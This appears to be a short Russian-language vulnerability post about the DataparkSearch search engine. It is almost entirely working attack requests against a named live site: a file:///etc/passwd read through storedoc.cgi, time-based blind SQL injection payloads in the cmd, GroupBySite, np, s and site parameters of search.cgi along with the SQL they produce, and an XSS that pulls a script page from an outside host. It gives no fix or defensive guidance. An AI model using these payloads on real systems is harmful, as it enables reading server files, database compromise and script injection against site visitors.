DataparkSearch Engine, SQL injection, XSS, Cross Site Scripting, File Include
DataparkSearch

Все SQL-inject запросы надо кодировать в Urlencode ALL, иначе экранируются.
В фаиле storedoc.cgi
Чтение фаилов: /etc/passwd
в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146
/kurgan/cache?DU=file:///etc/passwd
/kurgan/cache?DU=file%3a%2f%2f%2fetc%2fpasswd

Blind SQL Injection
В фаиле search.cgi
URL encoded GET в параметре cmd
/kurgan/s?cmd=%25D0%259D%25D0%25B0%25D0%25B9%25D1%2582%25D0%25B8%27%3dsleep%282%29%3d%27&GroupBySite=yes&np=0&q=1&s=DRP&syn=1
Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82971,'cmd','%D0%9D%D0%B0%D0%B9%D1%82%D0%B8'=sleep(2)='')
URL encoded GET в параметре GroupBySite
/kurgan/s?cmd=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&GroupBySite=yes%27%3dsleep%282%29%3d%27&np=0&q=1&s=DRP&syn=1
Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82972,'GroupBySite','yes'=sleep(2)='')
URL encoded GET в параметре np
/kurgan/s?cmd=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&GroupBySite=yes&np=0%27%3dsleep%282%29%3d%27&q=1&s=RPD&syn=1
Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82974,'np','0'=sleep(2)='')
URL encoded GET в параметре s
/kurgan/s?cmd=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&GroupBySite=yes&np=0&q=1&s=DRP%27%3dsleep%282%29%3d%27&syn=1
Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82976,'s','DRP'=sleep(2)='')
URL encoded GET в параметре site was set to 2126886643' and sleep(2)='
/kurgan/s?GroupBySite=yes&np=0&q=1&site=2126886643%27%20and%20sleep%282%29%3d%27&syn=1
Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82980,'site','2126886643' and sleep(2)='')
Cross Site Scripting
В фаиле storedoc.cgi
Загрузка произвольного фаила для отображения или выполнения JavaScript кода
http://kurganland.ru/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=http://himic.ru/xss.html&L=tr&label=&q=1&rec_id=1332401146
Выполнение:
http://kurganland.ru/kurgan/cache?DU=http://himic.ru/xss.html

Выполнение:
http://kurganland.ru/kurgan/cache?DU=http://himic.ru/

Нет комментариев